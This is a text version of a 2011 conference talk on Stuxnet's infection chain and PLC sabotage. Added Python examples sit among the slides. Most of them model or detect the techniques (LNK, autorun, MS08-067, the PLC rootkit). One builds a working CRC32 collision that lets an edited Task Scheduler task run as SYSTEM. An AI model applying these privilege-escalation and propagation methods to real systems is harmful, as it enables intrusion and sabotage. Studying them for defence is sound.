Stuxnet dc9723

Page 1: Stuxnet dc9723

Tomer Teller , DC9723, 18/1/11

Stuxnet:How to take over a (nuclear) power plant

Page 2: Stuxnet dc9723

Who Am I?

A Black Hat gone good (courier -> cracker)

Security Evangelist at Check Point

Specialize in network hacking & reversing

Finished all levels of Angry Birds (3 stars!)

Page 3: Stuxnet dc9723

Why are we here?

We like Malware

Stuxnet is a Malware!

Iran is involved

Microsoft got pwn'd

Learn new techniques

See some DEMOs (hopefully)

Page 4: Stuxnet dc9723

Terminology

SCADA/ICS - SCADA stands for Supervisory Control and Data Acquisition. The term is commonly used to refer to Industrial Control Systems (ICS) in general: computer systems that monitor and control industrial, infrastructure, or facility-based processes.

PLC - A Programmable Logic Controller: an embedded controller that drives machinery, e.g. on factory assembly lines.

Field PG - The Siemens programming device (a laptop) used to program PLCs.

WinCC/Step7 - Siemens applications used to program PLCs (IDE/compiler); installed on a Field PG.

Page 5: Stuxnet dc9723

Threat Overview

Architecture: a single DLL, with a resource section containing the payloads; component based

Exploits: 4 undisclosed vulns!

Techniques: "cunning" hacks, the LoadLibrary() maneuver

Page 6: Stuxnet dc9723

Statistics

This is not normal…

ref: Symantec dossier paper

Page 7: Stuxnet dc9723

Welcome to the Battle Field

Page 8: Stuxnet dc9723

What’s going to happen?

Page 9: Stuxnet dc9723

What’s going to happen?

Water Pipe

Gas pipeline

Nuclear Reactor

Page 10: Stuxnet dc9723

Mission Objectives

Introduce Threat to Target

Propagate inside the network

Infect Field PG machines

GOAL: Reprogram ICS machines

Page 11: Stuxnet dc9723

The First Infection

An Insider

A Contractor

A SCADA Conference

USB Give-away

Super Sheep over the fence

Page 12: Stuxnet dc9723

Removable Drive Propagation

Okay, now what?

LNK auto-execution (MS10-046)

Autorun.inf technique

Page 13: Stuxnet dc9723

LNK Auto-Execution (MS10-046)

Design-level flaw in how the Windows Shell parses LNK (shortcut) files.

The file format can store a link to a Control Panel applet (CPL), which is a DLL.

The vulnerable code handles such a link the same way it handles an icon: when the shortcut is displayed, the shell loads the referenced DLL to obtain its icon.

Problem: the system does not check whether that DLL lives in SYSTEM32 or is on the whitelist of registered Control Panel applets.

The result: an arbitrary DLL can be loaded (and its code run) merely by displaying a shortcut, e.g. when Explorer opens a removable drive.

Page 14: Stuxnet dc9723

LNK Binary Format (DIY)

ShellLinkHeader:

Offset  Size  Field
0x0000  4     HeaderSize
0x0004  16    LinkCLSID
0x0014  4     LinkFlags (which optional structures follow)
.
.
0x0042  4     (reserved)

Control Items (ItemID):

Offset  Size  Field
0x0000  2     itemIDSize
0x0002  2     wDummy
...
0x0018  n     Path
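The two tables above are enough to write a triage parser for shortcuts pulled off a removable drive. The Python below is an added example (not the speaker's code and not Stuxnet's): it walks the ShellLinkHeader and the LinkTargetIDList per the layout on the slide and flags any shell item that carries a UTF-16 path ending in .dll or .cpl, which is the shape of an MS10-046 trigger. The two sample shortcuts are constructed inline with a helper (the 0x18-byte item prefix mirrors the slide's "wDummy ... Path" layout; the item contents are made up), and the .dll/.cpl test is a heuristic, since legitimate shortcuts to registered applets exist.

```python
import re
import struct

# ShellLinkHeader constants (MS-SHLLINK): fixed 0x4C-byte header, fixed CLSID,
# and the LinkFlags bit that says a LinkTargetIDList follows the header.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000C000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x00000001


def parse_lnk(data):
    """Parse the header and the LinkTargetIDList; return (LinkFlags, [ItemID data, ...])."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size = struct.unpack_from("<I", data, 0x00)[0]
    if header_size != LNK_HEADER_SIZE or data[0x04:0x14] != LNK_CLSID:
        raise ValueError("bad HeaderSize or LinkCLSID")
    link_flags = struct.unpack_from("<I", data, 0x14)[0]
    items = []
    if link_flags & HAS_LINK_TARGET_ID_LIST:
        if len(data) < LNK_HEADER_SIZE + 2:
            raise ValueError("IDListSize missing")
        id_list_size = struct.unpack_from("<H", data, LNK_HEADER_SIZE)[0]
        pos = LNK_HEADER_SIZE + 2
        end = pos + id_list_size
        if end > len(data):
            raise ValueError("IDListSize runs past end of file")
        while pos + 2 <= end:
            item_size = struct.unpack_from("<H", data, pos)[0]
            if item_size == 0:          # TerminalID ends the list
                break
            if item_size < 2 or pos + item_size > end:
                raise ValueError("malformed ItemID")
            items.append(bytes(data[pos + 2:pos + item_size]))
            pos += item_size
    return link_flags, items


# A run of printable ASCII encoded as UTF-16LE (each char followed by 0x00).
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){3,}")


def find_cpl_payloads(data):
    """Return UTF-16 strings inside IDList items that name a .dll or .cpl.

    Heuristic: a module path inside a shell item is what makes the shell load
    that module to draw the shortcut's icon. Legitimate applet shortcuts exist,
    so cross-check hits against the registered Control Panel applets.
    """
    _flags, items = parse_lnk(data)
    hits = []
    for item in items:
        for match in UTF16_RUN.finditer(item):
            text = match.group().decode("utf-16-le")
            if text.lower().endswith((".dll", ".cpl")):
                hits.append(text)
    return hits


def build_lnk(item_datas):
    """Constructed helper: assemble a minimal LNK from ItemID data blobs."""
    flags = HAS_LINK_TARGET_ID_LIST if item_datas else 0
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
              + b"\x00" * (LNK_HEADER_SIZE - 24))          # remaining header fields zeroed
    id_list = b"".join(struct.pack("<H", len(d) + 2) + d for d in item_datas) + b"\x00\x00"
    return header + struct.pack("<H", len(id_list)) + id_list


# Constructed samples: a placeholder root item, then an item laid out like the
# slide's control item (0x18 bytes of header/dummy fields, then the UTF-16 path).
MALICIOUS_LNK = build_lnk([
    b"\x1f" + b"\x00" * 7,
    b"\x00" * 0x18 + "E:\\payload.dll".encode("utf-16-le") + b"\x00\x00",
])
BENIGN_LNK = build_lnk([
    b"\x1f" + b"\x00" * 7,
    b"\x00" * 0x18 + "C:\\Windows\\notepad.exe".encode("utf-16-le") + b"\x00\x00",
])

if __name__ == "__main__":
    print("malicious:", find_cpl_payloads(MALICIOUS_LNK))
    print("benign:   ", find_cpl_payloads(BENIGN_LNK))
```

Point `find_cpl_payloads` at the raw bytes of every *.lnk found on a mounted drive image; a hit plus a DLL sitting next to the shortcut is the pattern to escalate.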

Page 15: Stuxnet dc9723

Autorun.inf Technique

We all know the AutoRun.inf file & the AutoPlay dialog

The code that parses that file is very "flexible"

How flexible?

Page 16: Stuxnet dc9723

Autorun.inf Technique cont.

(diagram: one file labelled both EXE and AutoRun)
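To make "flexible" concrete, here is an added Python example (not the speaker's code and not Stuxnet's) that builds a constructed dual-format file, a fake MZ header with filler followed by INI text, and contrasts a forgiving autorun.inf reader of the kind the slide describes with Python's by-the-book INI parser, which rejects the same bytes. The last function is a small triage routine for autorun.inf files taken off removable media; the key names it looks for are the standard AutoRun keys, the sample contents are made up.

```python
import configparser


def parse_autorun_leniently(data):
    """Model of a forgiving autorun.inf reader: find the [autorun] section
    anywhere in the file, take key=value lines from it, ignore everything else."""
    text = data.decode("latin-1")        # 1:1 bytes -> chars, never fails on binary junk
    keys = {}
    in_section = False
    for line in text.split("\n"):
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            keys[key.strip().lower()] = value.strip()
    return keys


def strict_ini_accepts(data):
    """Whether a strict INI parser accepts the same bytes (junk before the
    first section header is a parse error there)."""
    try:
        configparser.ConfigParser(interpolation=None).read_string(data.decode("latin-1"))
        return True
    except configparser.Error:
        return False


def autorun_findings(data):
    """Red flags for an autorun.inf recovered from a removable drive."""
    keys = parse_autorun_leniently(data)
    findings = []
    if data[:2] == b"MZ":
        findings.append("file starts with a PE header: autorun.inf is also an executable")
    if data.lstrip()[:9].lower() != b"[autorun]":
        findings.append("[autorun] section does not start the file: junk precedes it")
    for k in ("open", "shellexecute", "shell\\open\\command"):
        if k in keys:
            findings.append("%s=%s" % (k, keys[k]))
    return findings


# Constructed: a fake PE image (MZ header plus filler) with INI text appended,
# and a plain autorun.inf for comparison.
FAKE_EXE = b"MZ\x90\x00" + bytes(range(0x41, 0x5B)) * 8
DUAL_FILE = FAKE_EXE + b"\r\n[autorun]\r\nopen=autorun.inf\r\nshell\\open\\command=autorun.inf\r\n"
PLAIN_FILE = b"[autorun]\r\nopen=setup.exe\r\nicon=setup.exe,0\r\n"

if __name__ == "__main__":
    print("lenient:", parse_autorun_leniently(DUAL_FILE))
    print("strict accepts dual file:", strict_ini_accepts(DUAL_FILE))
    for f in autorun_findings(DUAL_FILE):
        print(" -", f)
```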

Page 17: Stuxnet dc9723

The LoadLibrary() Technique

Whenever Stuxnet needs to load a DLL (including itself), it uses a special method to bypass the behaviour-blocking detection of anti-virus products.

Stuxnet calls LoadLibrary() with a specially crafted file name that does not exist on disk, so a normal LoadLibrary() call on it would fail.

ntdll.dll is hooked to watch for requests to load these specially crafted file names.

The hook maps such a file name to a different location, specified by Stuxnet, so the DLL is loaded from a location Stuxnet controls rather than from a file of that name.

File name example: KERNEL32.DLL.ASLR.[ADDRESS]

Page 18: Stuxnet dc9723

User/Kernel Space Rootkits

User-space rootkit: hide files by hooking Kernel32 & NTDLL
▪ FindFirstFileW, FindNextFileW
▪ NtQueryDirectoryFile, ZwQueryDirectoryFile

Kernel-space rootkit: register a device driver (MrxNet.sys) to intercept I/O Request Packets (IRP)
▪ Monitor Directory Control & Query (read/write)
▪ Detect & infect removable devices

Page 19: Stuxnet dc9723

Compromised Certificates

The driver was digitally signed with a legitimate code-signing certificate (first Realtek's, later JMicron's) that is trusted by Windows.

Both companies have offices in the Hsinchu Science and Industrial Park (Taiwan)

Page 20: Stuxnet dc9723

No Admin?! No Problem! (Vista+ Style)

Privilege escalation in Task Scheduler. Published 20-11-2010: www.exploit-db.com/exploits/15589

The task's XML file is protected only by a CRC32 checksum

Modify the original task so that it runs under LocalSystem

Fix the CRC32 checksum by "padding" the file <- collision
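The "padding" step is a CRC32 collision: CRC32 is linear, so four chosen bytes inserted anywhere in the file can steer the checksum to any value, including the one Task Scheduler stored for the original file. The Python below is an added example, not the exploit-db code and not the speaker's: it forges the four bytes for a given prefix, suffix and target, and puts them inside an XML comment before the closing tag so the modified task still parses. The task definition is constructed (the namespace is the real Task Scheduler one, the account name is made up); S-1-5-18 is the LocalSystem SID.

```python
import string
import xml.etree.ElementTree as ET
import zlib

# Reflected CRC-32 (the one zlib and Task Scheduler use) as a byte-at-a-time table.
_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _TABLE.append(_c)
# The top byte of every table entry is distinct, so it identifies the index used.
_INDEX_BY_TOP_BYTE = {_TABLE[i] >> 24: i for i in range(256)}


def _step(reg, byte):
    return _TABLE[(reg ^ byte) & 0xFF] ^ (reg >> 8)


def _unstep(reg, byte):
    """Invert one CRC step when the byte that was fed is known."""
    idx = _INDEX_BY_TOP_BYTE[reg >> 24]
    prev_high = ((reg ^ _TABLE[idx]) << 8) & 0xFFFFFFFF
    return prev_high | ((idx ^ byte) & 0xFF)


def forge_crc32(prefix, suffix, target):
    """Return 4 bytes X such that zlib.crc32(prefix + X + suffix) == target."""
    reg = target ^ 0xFFFFFFFF                 # internal register after the whole message
    for byte in reversed(suffix):             # walk the known suffix backwards
        reg = _unstep(reg, byte)
    # After 4 unknown bytes the register depends only on the 4 table indices hit,
    # so peel them off (last first) from the top byte ...
    indices = []
    for _ in range(4):
        idx = _INDEX_BY_TOP_BYTE[reg >> 24]
        indices.append(idx)
        reg = ((reg ^ _TABLE[idx]) << 8) & 0xFFFFFFFF
    # ... then replay forward from the prefix, choosing each byte to hit that index.
    reg = zlib.crc32(prefix) ^ 0xFFFFFFFF
    out = bytearray()
    for idx in reversed(indices):
        byte = (reg ^ idx) & 0xFF
        out.append(byte)
        reg = _step(reg, byte)
    return bytes(out)


_SAFE = set((string.ascii_letters + string.digits).encode())


def forge_task_xml(original, modified):
    """Pad `modified` with an XML comment so its CRC32 equals that of `original`."""
    target = zlib.crc32(original)
    head, close_tag, rest = modified.rpartition(b"</Task>")
    if not close_tag:
        raise ValueError("no </Task> element")
    for n in range(1000000):   # vary the comment text until the 4 forged bytes are printable
        prefix = head + b"<!-- pad%d " % n
        suffix = b" -->" + close_tag + rest
        x = forge_crc32(prefix, suffix, target)
        if all(b in _SAFE for b in x):
            return prefix + x + suffix
    raise RuntimeError("no printable collision found")


def task_user_id(task_xml):
    """UserId of a task definition; parsing it also proves the XML is well-formed."""
    ns = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
    return ET.fromstring(task_xml).find(".//%sUserId" % ns).text


def crc32_of(data):
    return zlib.crc32(data)


# Constructed task definition (real Task Scheduler namespace, fictitious account).
ORIGINAL_TASK = (
    b'<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
    b'<Principals><Principal id="Author"><UserId>lowpriv</UserId></Principal></Principals>'
    b'<Actions Context="Author"><Exec><Command>C:\\payload.exe</Command></Exec></Actions>'
    b"</Task>"
)
# S-1-5-18 is the LocalSystem SID: the task now runs as SYSTEM, while the checksum
# Task Scheduler stored for the original file still matches the padded file.
MODIFIED_TASK = ORIGINAL_TASK.replace(b"<UserId>lowpriv</UserId>", b"<UserId>S-1-5-18</UserId>")

if __name__ == "__main__":
    forged = forge_task_xml(ORIGINAL_TASK, MODIFIED_TASK)
    print(forged.decode())
    print("crc match:", crc32_of(forged) == crc32_of(ORIGINAL_TASK))
```

The takeaway for defenders is the same one Microsoft drew: a CRC is an integrity check against accidents, not against an attacker, and the fix replaced it with a SHA-256 hash plus access control on the task files.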

Page 21: Stuxnet dc9723

No Admin?! No Problem! (XP Style)

Privilege escalation in keyboard layout loading (MS10-073)

A keyboard layout file can be loaded from anywhere on the file system, so an unprivileged user can supply a crafted one

The crafted layout supplies an out-of-bounds index into an array of function pointers in win32k.sys:

cf12fa38  cf933423  win32k!KbdNlsFuncTypeDummy   [index 0]
cf12fa3c  cf93342e  win32k!KbdNlsFuncTypeNormal  [index 1]
cf12fa40  cf933474  win32k!KbdNlsFuncTypeAlt     [index 2]
cf12fa44  ff496867                               [index 3]
cf12fa48  ff466564                               [index 4]
cf12fa4c  60636261  <- user space address        [index 5]
cf12fa50  0000006e  .

1. Copy the payload code to that user-space address (0x60636261)

2. Change the layout to point at index #5

3. Load the keyboard layout, so the kernel calls through the bogus pointer into the payload

Page 22: Stuxnet dc9723

Demo(s) Time

Autorun.inf

LNK vulnerability (MS10-046)

User Space RootKit (source available)

Page 23: Stuxnet dc9723

Mission #1 Completed

Page 24: Stuxnet dc9723

Recap

Introduce Threat to Target

Propagate inside the network

Infect Field PG machines

GOAL: Reprogram ICS machines

Page 25: Stuxnet dc9723

MS08-067 – Server Service Vulnerability

SRVSVC is an RPC interface that controls shares and files.

Binding to this interface over SMB and calling one of its functions, NetprPathCanonicalize(), with a malformed path string, e.g. /<name>/../../<rest of string>, results in a buffer overflow. Successful exploitation can lead to code execution with SYSTEM-level privileges.

NetprPathCanonicalize() on the example path (each step searches backwards for the previous '\'):

\share\path1\path2/../../../../buff
   search for '\'
\share\path1/../../../buff
   search for '\'
\share/../../buff
   search for '\'
/../buff
   search for '\' -> none left, the backward search runs below the start of the buffer
Buffer Overflow
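The step sequence above can be turned into a small model of the bug. The Python below is an added example, not the Windows code (the real routine in netapi32 does more than this loop): it lays a path out in a bytearray with 16 constructed bytes "below" it, collapses each /../ by walking back to the previous separator and moving the rest of the string over it, and shows the slide's example corrupting the bytes below the buffer when the walk is unbounded, next to the bounded version that refuses.

```python
SEPARATORS = frozenset(b"\\/")


def canonicalize(mem, start, bounded):
    """Collapse '/../' in the NUL-terminated path at mem[start:], in place.

    Model of NetprPathCanonicalize's inner loop: find '/..', walk back to the
    previous separator, move the remainder of the string over it. With
    bounded=False the backward walk may run below `start`, which is the
    MS08-067 bug; with bounded=True the function refuses instead.
    """
    end = mem.index(0, start)                  # position of the terminating NUL
    search_from = start
    while True:
        j = mem.find(b"/../", search_from, end)
        if j < 0:
            return bytes(mem[start:end])
        k = j - 1                               # walk back to the previous separator
        while mem[k] not in SEPARATORS:
            k -= 1
            if k < 0:
                raise IndexError("walked off the modelled memory entirely")
        if k < start and bounded:
            raise ValueError("'..' climbs above the start of the buffer")
        tail = mem[j + 3:end + 1]               # everything after '/..', incl. NUL
        mem[k:k + len(tail)] = tail             # memmove; may land below `start`
        end = k + len(tail) - 1
        search_from = k


# Constructed: 16 bytes that sit directly below the path buffer (think of a
# saved pointer); the leading '\' is where the unbounded walk finally stops.
PRE_BUFFER = b"\\" + b"A" * 15
EXPLOIT_PATH = b"\\share\\path1\\path2/../../../../buff"   # the slide's example


def run_canonicalize(path, bounded):
    """Lay `path` out after PRE_BUFFER and canonicalize it.

    Returns (result, bytes below the buffer) so corruption is visible."""
    mem = bytearray(PRE_BUFFER + path + b"\x00" + b"\x00" * 16)
    start = len(PRE_BUFFER)
    result = canonicalize(mem, start, bounded)
    return result, bytes(mem[:start])


def is_rejected(path):
    """True if the bounded (fixed) canonicalizer refuses the path."""
    try:
        run_canonicalize(path, True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(run_canonicalize(b"\\share\\a/../b", True))
    print("fixed code rejects exploit path:", is_rejected(EXPLOIT_PATH))
    result, below = run_canonicalize(EXPLOIT_PATH, False)
    print("bytes below the buffer after the bug:", below)
```

In the unbounded run the bytes below the buffer come back as "/buff" followed by a NUL: the remainder of the string was copied to where the backward search happened to stop, which in the real service is attacker-influenced stack memory.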

Page 26: Stuxnet dc9723

MS10-061 – Print Spooler Vulnerability

Published in 2009 in a hacker magazine (Hakin9)

Allows a file to be written into the %System% folder by "printing" a document to a file on a shared printer.

Stuxnet "prints" 2 files:
▪ A Managed Object Format (MOF) file, used to register a WMI event
▪ The Stuxnet worm executable itself

Once the OS detects the MOF file in its auto-compile directory (%System%\wbem\mof\<file>), it compiles it and registers the event, whose action is to run the dropped executable.

Page 27: Stuxnet dc9723

Network Shares Infection

Stuxnet enumerates all user accounts of the computer and of the domain, then tries every available network resource:
▪ Using the user's credentials, drop the Stuxnet executable on the remote share
▪ Schedule a network job via NetScheduleJobAdd() to run it 2 minutes later

Page 28: Stuxnet dc9723

P2P Communication Component

Stuxnet installs an RPC client/server. Compromised computers can connect to each other and ask for the latest version.

Exchange between an infected machine acting as client and one acting as server:
  Client -> Server: Get Version (0)
  Server -> Client: Send Version
  Client -> Server: Request Update (4)
  Server -> Client: Send Update

RPC Server Routines:
0: Return Current Version
1: Inject & Execute
2: Load module
3: Inject to lsass.exe
4: Send Current Version
5: Create Process
6: Read File

ref: Symantec dossier paper

Page 29: Stuxnet dc9723

Command & Control Component

Stuxnet communicates back using an HTTP C&C backdoor and encrypted data.

Exchange between an infected machine and the command and control server:
  Infected machine -> www.msn.com: GET (connectivity check)
  www.msn.com -> Infected machine: 200 OK
  Infected machine -> C&C server: GET index.php?data=[encrypted]
  C&C server -> Infected machine: Command X
  C&C server -> Infected machine: Command Y

ref: Symantec dossier paper

Page 30: Stuxnet dc9723

Mission #2 Completed

(diagram labels: Ping / Alive)

Page 31: Stuxnet dc9723

Recap

Introduce Threat to Target

Propagate inside the network

Infect Field PG machines

GOAL: Reprogram ICS machines

Page 32: Stuxnet dc9723

PLC RootKit

On the Field PG, Stuxnet looks for:
▪ A specific version of STEP7/WinCC
▪ A specific network card
▪ A specific PLC model & version connected

Stuxnet replaces the DLL on the Field PG that is in charge of communicating with the PLC (s7otbxdx.dll).

After the replacement Stuxnet is able to:
▪ Monitor PLC code blocks being written to and read from the PLC
▪ Infect a PLC by inserting its own malicious blocks
▪ Mask the fact that the PLC is infected

Page 33: Stuxnet dc9723

Infected PLC Example (READ/WRITE)

Read path: Step7/WinCC -> New DLL -> Original DLL -> PLC
  Step7/WinCC calls Read()
  The original DLL returns the PLC's original data
  The new DLL hands modified data back to Step7/WinCC

Write path: Step7/WinCC -> New DLL -> Original DLL -> PLC
  Step7/WinCC calls Write(Data)
  The new DLL passes modified data to the original DLL, which writes it to the PLC

(figure: the example values shown on the Field PG differ from the values actually held by the PLC)
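The read/write diagram, as an added Python model (not the speaker's code and not the interface of the real s7otbxdx.dll): a stand-in PLC block store, the original pass-through library, and a drop-in replacement with the same interface that appends a call to an injected block on every write of the main cycle block, strips that call again on read, and hides the injected block from directory listings. The block names OB1/FC1 are generic STEP7 block names; FC_EVIL and its contents are placeholders. The last function is the check a practitioner wants: compare what the engineering station reports with a read taken through a clean library.

```python
class Plc:
    """Constructed stand-in for the controller's block store (name -> code bytes)."""

    def __init__(self):
        self.blocks = {"OB1": b"call FC1", "FC1": b"read sensor; set valve"}

    def read(self, name):
        return self.blocks[name]

    def write(self, name, data):
        self.blocks[name] = data

    def list_blocks(self):
        return sorted(self.blocks)


class OriginalDll:
    """The communication library as shipped: every call goes straight to the PLC."""

    def __init__(self, plc):
        self.plc = plc

    def read(self, name):
        return self.plc.read(name)

    def write(self, name, data):
        self.plc.write(name, data)

    def list_blocks(self):
        return self.plc.list_blocks()


INJECTED_BLOCK = "FC_EVIL"                   # hypothetical name for the injected block
HOOK = b"; call " + INJECTED_BLOCK.encode()  # appended to the main cycle block


class RootkitDll:
    """Drop-in replacement with the same interface: infects on write, lies on read."""

    def __init__(self, original):
        self.original = original

    def write(self, name, data):
        if name == "OB1":                        # the cyclic main block: hook it
            self.original.write(INJECTED_BLOCK, b"sabotage logic")
            data += HOOK
        self.original.write(name, data)

    def read(self, name):
        if name == INJECTED_BLOCK:
            raise KeyError(name)                 # officially, this block does not exist
        data = self.original.read(name)
        if data.endswith(HOOK):
            data = data[:-len(HOOK)]             # strip the hook before the engineer sees it
        return data

    def list_blocks(self):
        return [b for b in self.original.list_blocks() if b != INJECTED_BLOCK]


def dump(link):
    """What a client of `link` believes the PLC holds."""
    return {name: link.read(name) for name in link.list_blocks()}


def scenario():
    """Engineer downloads the project through the replaced DLL; return
    (what the Field PG shows, what a clean read of the PLC shows)."""
    plc = Plc()
    station = RootkitDll(OriginalDll(plc))
    station.write("OB1", b"call FC1")
    return dump(station), dump(OriginalDll(plc))


def differing_blocks(view_a, view_b):
    """Blocks whose content differs between two views: the out-of-band check."""
    return sorted(n for n in set(view_a) | set(view_b) if view_a.get(n) != view_b.get(n))


if __name__ == "__main__":
    seen, truth = scenario()
    print("Field PG sees:", seen)
    print("PLC holds:    ", truth)
    print("differs:      ", differing_blocks(seen, truth))
```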

Page 34: Stuxnet dc9723

Recap

Introduce Threat to Target

Propagate inside the network

Infect Field PG machines

GOAL: Reprogram ICS machines

Page 35: Stuxnet dc9723

Mission Accomplished

Page 36: Stuxnet dc9723

Who's Behind It?

Some say Israel:
▪ Project path left in the driver: b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb
▪ myrtus -> myrtle -> Hadassah -> Queen Esther
▪ My-RTUs -> Remote Terminal Units -> control SCADA systems
▪ The value 0x19790509 (used by Stuxnet as an infection marker)
▪ May 09, 1979: that date coincides with Iran's execution of Habib Elghanian, a prominent Jewish businessman in Iran

Some say Germany

Some say USA

Page 37: Stuxnet dc9723

Questions

?

Page 38: Stuxnet dc9723

kthxbye

Tomer [email protected]